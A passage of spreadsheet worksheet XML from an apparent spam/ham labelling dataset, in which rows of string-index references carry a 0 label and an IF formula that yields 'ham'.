      <c r="B5217">
        <v>0</v>
      </c>
      <c r="C5217" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5218" t="s">
        <v>4535</v>
      </c>
      <c r="B5218">
        <v>0</v>
      </c>
      <c r="C5218" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5219" t="s">
        <v>4536</v>
      </c>
      <c r="B5219">
        <v>0</v>
      </c>
      <c r="C5219" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5220" t="s">
        <v>4537</v>
      </c>
      <c r="B5220">
        <v>0</v>
      </c>
      <c r="C5220" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5221" t="s">
        <v>4538</v>
      </c>
      <c r="B5221">
        <v>0</v>
      </c>
      <c r="C5221" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5222" t="s">
        <v>4539</v>
      </c>
      <c r="B5222">
        <v>0</v>
      </c>
      <c r="C5222" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5223" t="s">
        <v>4540</v>
      </c>
      <c r="B5223">
        <v>0</v>
      </c>
      <c r="C5223" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5224" t="s">
        <v>4541</v>
      </c>
      <c r="B5224">
        <v>0</v>
      </c>
      <c r="C5224" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5225" t="s">
        <v>4542</v>
      </c>
      <c r="B5225">
        <v>0</v>
      </c>
      <c r="C5225" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5226" t="s">
        <v>4543</v>
      </c>
      <c r="B5226">
        <v>0</v>
      </c>
      <c r="C5226" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5227" t="s">
        <v>4544</v>
      </c>
      <c r="B5227">
        <v>0</v>
      </c>
      <c r="C5227" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5228" t="s">
        <v>4545</v>
      </c>
      <c r="B5228">
        <v>0</v>
      </c>
      <c r="C5228" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5229" t="s">
        <v>4546</v>
      </c>
      <c r="B5229">
        <v>0</v>
      </c>
      <c r="C5229" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5230" t="s">
        <v>4547</v>
      </c>
      <c r="B5230">
        <v>0</v>
      </c>
      <c r="C5230" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5231" t="s">
        <v>4548</v>
      </c>
      <c r="B5231">
        <v>0</v>
      </c>
      <c r="C5231" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5232" t="s">
        <v>4549</v>
      </c>
      <c r="B5232">
        <v>0</v>
      </c>
      <c r="C5232" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5233" t="s">
        <v>4550</v>
      </c>
      <c r="B5233">
        <v>0</v>
      </c>
      <c r="C5233" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5234" t="s">
        <v>4551</v>
      </c>
      <c r="B5234">
        <v>0</v>
      </c>
      <c r="C5234" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5235" t="s">
        <v>4552</v>
      </c>
      <c r="B5235">
        <v>0</v>
      </c>
      <c r="C5235" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5236" t="s">
        <v>4553</v>
      </c>
      <c r="B5236">
        <v>0</v>
      </c>
      <c r="C5236" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5237" t="s">
        <v>4554</v>
      </c>
      <c r="B5237">
        <v>0</v>
      </c>
      <c r="C5237" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5238" t="s">
        <v>4555</v>
      </c>
      <c r="B5238">
        <v>0</v>
      </c>
      <c r="C5238" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5239" t="s">
        <v>4556</v>
      </c>
      <c r="B5239">
        <v>0</v>
      </c>
      <c r="C5239" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5240" t="s">
        <v>4557</v>
      </c>
      <c r="B5240">
        <v>0</v>
      </c>
      <c r="C5240" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5241" t="s">
        <v>4558</v>
      </c>
      <c r="B5241">
        <v>0</v>
      </c>
      <c r="C5241" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5242" t="s">
        <v>4559</v>
      </c>
      <c r="B5242">
        <v>0</v>
      </c>
      <c r="C5242" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5243" t="s">
        <v>4560</v>
      </c>
      <c r="B5243">
        <v>0</v>
      </c>
      <c r="C5243" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5244" t="s">
        <v>4561</v>
      </c>
      <c r="B5244">
        <v>0</v>
      </c>
      <c r="C5244" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5245" t="s">
        <v>4562</v>
      </c>
      <c r="B5245">
        <v>0</v>
      </c>
      <c r="C5245" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5246" t="s">
        <v>4563</v>
      </c>
      <c r="B5246">
        <v>0</v>
      </c>
      <c r="C5246" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5247" t="s">
        <v>4564</v>
      </c>
      <c r="B5247">
        <v>0</v>
      </c>
      <c r="C5247" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5248" t="s">
        <v>4565</v>
      </c>
      <c r="B5248">
        <v>0</v>
      </c>
      <c r="C5248" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5249" t="s">
        <v>4566</v>
      </c>
      <c r="B5249">
        <v>0</v>
      </c>
      <c r="C5249" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5250" t="s">
        <v>4567</v>
      </c>
      <c r="B5250">
        <v>0</v>
      </c>
      <c r="C5250" t="str">
        <f t="shared" ref="C5250:C5313" si="82">IF(B5250="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5251" t="s">
        <v>4568</v>
      </c>
      <c r="B5251">
        <v>0</v>
      </c>
      <c r="C5251" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5252" t="s">
        <v>4569</v>
      </c>
      <c r="B5252">
        <v>0</v>
      </c>
      <c r="C5252" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5253" t="s">
        <v>4570</v>
      </c>
      <c r="B5253">
        <v>0</v>
      </c>
      <c r="C5253" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5254" t="s">
        <v>4571</v>
      </c>
      <c r="B5254">
        <v>0</v>
      </c>
      <c r="C5254" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5255" t="s">
        <v>4572</v>
      </c>
      <c r="B5255">
        <v>0</v>
      </c>
      <c r="C5255" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5256" t="s">
        <v>4573</v>
      </c>
      <c r="B5256">
        <v>0</v>
      </c>
      <c r="C5256" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5257" t="s">
        <v>4574</v>
      </c>
      <c r="B5257">
        <v>0</v>
      </c>
      <c r="C5257" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5258" t="s">
        <v>4575</v>
      </c>
      <c r="B5258">
        <v>0</v>
      </c>
      <c r="C5258" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5259" t="s">
        <v>4576</v>
      </c>
      <c r="B5259">
        <v>0</v>
      </c>
      <c r="C5259" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5260" t="s">
        <v>4577</v>
      </c>
      <c r="B5260">
        <v>0</v>
      </c>
      <c r="C5260" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5261" t="s">
        <v>4578</v>
      </c>
      <c r="B5261">
        <v>0</v>
      </c>
      <c r="C5261" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5262" t="s">
        <v>4579</v>
      </c>
      <c r="B5262">
        <v>0</v>
      </c>
      <c r="C5262" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5263" t="s">
        <v>4580</v>
      </c>
      <c r="B5263">
        <v>0</v>
      </c>
      <c r="C5263" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5264" t="s">
        <v>4581</v>
      </c>
      <c r="B5264">
        <v>0</v>
      </c>
      <c r="C5264" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5265" t="s">
        <v>4582</v>
      </c>
      <c r="B5265">
        <v>0</v>
      </c>
      <c r="C5265" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5266" t="s">
        <v>21</v>
      </c>
      <c r="B5266">
        <v>0</v>
      </c>
      <c r="C5266" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5267" t="s">
        <v>4583</v>
      </c>
      <c r="B5267">
        <v>0</v>
      </c>
      <c r="C5267" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5268" t="s">
        <v>4584</v>
      </c>
      <c r="B5268">
        <v>0</v>
      </c>
      <c r="C5268" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5269" t="s">
        <v>4585</v>
      </c>
      <c r="B5269">
        <v>0</v>
      </c>
      <c r="C5269" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5270" t="s">
        <v>4586</v>
      </c>
      <c r="B5270">
        <v>0</v>
      </c>
      <c r="C5270" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5271" t="s">
        <v>4586</v>
      </c>
      <c r="B5271">
        <v>0</v>
      </c>
      <c r="C5271" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5272" t="s">
        <v>4587</v>
      </c>
      <c r="B5272">
        <v>0</v>
      </c>
      <c r="C5272" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5273" t="s">
        <v>4588</v>
      </c>
      <c r="B5273">
        <v>0</v>
      </c>
      <c r="C5273" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5274" t="s">
        <v>4589</v>
      </c>
      <c r="B5274">
        <v>0</v>
      </c>
      <c r="C5274" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5275" t="s">
        <v>4590</v>
      </c>
      <c r="B5275">
        <v>0</v>
      </c>
      <c r="C5275" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5276" t="s">
        <v>4591</v>
      </c>
      <c r="B5276">
        <v>0</v>
      </c>
      <c r="C5276" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5277" t="s">
        <v>4592</v>
      </c>
      <c r="B5277">
        <v>0</v>
      </c>
      <c r="C5277" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5278" t="s">
        <v>4593</v>
      </c>
      <c r="B5278">
        <v>0</v>
      </c>
      <c r="C5278" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5279" t="s">
        <v>4594</v>
      </c>
      <c r="B5279">
        <v>0</v>
      </c>
      <c r="C5279" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5280" t="s">
        <v>4595</v>
      </c>
      <c r="B5280">
        <v>0</v>
      </c>
      <c r="C5280" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5281" t="s">
        <v>4596</v>
      </c>
      <c r="B5281">
        <v>0</v>
      </c>
      <c r="C5281" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5282" t="s">
        <v>4597</v>
      </c>
      <c r="B5282">
        <v>0</v>
      </c>
      <c r="C5282" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5283" t="s">
        <v>4598</v>
      </c>
      <c r="B5283">
        <v>0</v>
      </c>
      <c r="C5283" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5284" t="s">
        <v>4599</v>
      </c>
      <c r="B5284">
        <v>0</v>
      </c>
      <c r="C5284" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5285" t="s">
        <v>4600</v>
      </c>
      <c r="B5285">
        <v>0</v>
      </c>
      <c r="C5285" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5286" t="s">
        <v>4601</v>
      </c>
      <c r="B5286">
        <v>0</v>
      </c>
      <c r="C5286" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5287" t="s">
        <v>4602</v>
      </c>
      <c r="B5287">
        <v>0</v>
      </c>
      <c r="C5287" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5288" t="s">
        <v>4603</v>
      </c>
      <c r="B5288">
        <v>0</v>
      </c>
      <c r="C5288" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5289" t="s">
        <v>4604</v>
      </c>
      <c r="B5289">
        <v>0</v>
      </c>
      <c r="C5289" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5290" t="s">
        <v>4605</v>
      </c>
      <c r="B5290">
        <v>0</v>
      </c>
      <c r="C5290" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5291" t="s">
        <v>4606</v>
      </c>
      <c r="B5291">
        <v>0</v>
      </c>
      <c r="C5291" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5292" t="s">
        <v>4607</v>
      </c>
      <c r="B5292">
        <v>0</v>
      </c>
      <c r="C5292" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5293" t="s">
        <v>4608</v>
      </c>
      <c r="B5293">
        <v>0</v>
      </c>
      <c r="C5293" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5294" t="s">
        <v>4609</v>
      </c>
      <c r="B5294">
        <v>0</v>
      </c>
      <c r="C5294" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5295" t="s">
        <v>4610</v>
      </c>
      <c r="B5295">
        <v>0</v>
      </c>
      <c r="C5295" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5296" t="s">
        <v>4611</v>
      </c>
      <c r="B5296">
        <v>0</v>
      </c>
      <c r="C5296" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5297" t="s">
        <v>4612</v>
      </c>
      <c r="B5297">
        <v>0</v>
      </c>
      <c r="C5297" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5298" t="s">
        <v>4613</v>
      </c>
      <c r="B5298">
        <v>0</v>
      </c>
      <c r="C5298" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5299" t="s">
        <v>4614</v>
      </c>
      <c r="B5299">
        <v>0</v>
      </c>
      <c r="C5299" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5300" t="s">
        <v>4615</v>
      </c>
      <c r="B5300">
        <v>0</v>
      </c>
      <c r="C5300" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5301" t="s">
        <v>4616</v>
      </c>
      <c r="B5301">
        <v>0</v>
      </c>
      <c r="C5301" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5302" t="s">
        <v>4617</v>
      </c>
      <c r="B5302">
        <v>0</v>
      </c>
      <c r="C5302" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5303" t="s">
        <v>4618</v>
      </c>
      <c r="B5303">
        <v>0</v>
      </c>
      <c r="C5303" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5304" t="s">
        <v>4619</v>
      </c>
      <c r="B5304">
        <v>0</v>
      </c>
      <c r="C5304" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5305" t="s">
        <v>4620</v>
      </c>
      <c r="B5305">
        <v>0</v>
      </c>
      <c r="C5305" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5306" t="s">
        <v>4621</v>
      </c>
      <c r="B5306">
        <v>0</v>
      </c>
      <c r="C5306" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5307" t="s">
        <v>4622</v>
      </c>
      <c r="B5307">
        <v>0</v>
      </c>
      <c r="C5307" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5308" t="s">
        <v>4623</v>
      </c>
      <c r="B5308">
        <v>0</v>
      </c>
      <c r="C5308" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5309" t="s">
        <v>4624</v>
      </c>
      <c r="B5309">
        <v>0</v>
      </c>
      <c r="C5309" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5310" t="s">
        <v>4625</v>
      </c>
      <c r="B5310">
        <v>0</v>
      </c>
      <c r="C5310" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5311" t="s">
        <v>4626</v>
      </c>
      <c r="B5311">
        <v>0</v>
      </c>
      <c r="C5311" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5312" t="s">
        <v>4627</v>
      </c>
      <c r="B5312">
        <v>0</v>
      </c>
      <c r="C5312" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5313" t="s">
        <v>4628</v>
      </c>
      <c r="B5313">
        <v>0</v>
      </c>
      <c r="C5313" t="str">
        <f t="shared" si="82"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5314" t="s">
        <v>4629</v>
      </c>
      <c r="B5314">
        <v>0</v>
      </c>
      <c r="C5314" t="str">
        <f t="shared" ref="C5314:C5377" si="83">IF(B5314="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5315" t="s">
        <v>4630</v>
      </c>
      <c r="B5315">
        <v>0</v>
      </c>
      <c r="C5315" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5316" t="s">
        <v>4631</v>
      </c>
      <c r="B5316">
        <v>0</v>
      </c>
      <c r="C5316" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5317" t="s">
        <v>4632</v>
      </c>
      <c r="B5317">
        <v>0</v>
      </c>
      <c r="C5317" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5318" t="s">
        <v>4633</v>
      </c>
      <c r="B5318">
        <v>0</v>
      </c>
      <c r="C5318" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5319" t="s">
        <v>4634</v>
      </c>
      <c r="B5319">
        <v>0</v>
      </c>
      <c r="C5319" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5320" t="s">
        <v>4635</v>
      </c>
      <c r="B5320">
        <v>0</v>
      </c>
      <c r="C5320" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5321" t="s">
        <v>4636</v>
      </c>
      <c r="B5321">
        <v>0</v>
      </c>
      <c r="C5321" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5322" t="s">
        <v>4637</v>
      </c>
      <c r="B5322">
        <v>0</v>
      </c>
      <c r="C5322" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5323" t="s">
        <v>4638</v>
      </c>
      <c r="B5323">
        <v>0</v>
      </c>
      <c r="C5323" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5324" t="s">
        <v>4639</v>
      </c>
      <c r="B5324">
        <v>0</v>
      </c>
      <c r="C5324" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5325" t="s">
        <v>4640</v>
      </c>
      <c r="B5325">
        <v>0</v>
      </c>
      <c r="C5325" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5326" t="s">
        <v>4641</v>
      </c>
      <c r="B5326">
        <v>0</v>
      </c>
      <c r="C5326" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5327" t="s">
        <v>4642</v>
      </c>
      <c r="B5327">
        <v>0</v>
      </c>
      <c r="C5327" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5328" t="s">
        <v>4643</v>
      </c>
      <c r="B5328">
        <v>0</v>
      </c>
      <c r="C5328" t="str">
        <f t="shared" si="83"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5329" t="s">
        <v>4644</v>
      </c>
      <c r="B5329">
        <v>0</v>
      </c>
      <c r="C5329" t="str">
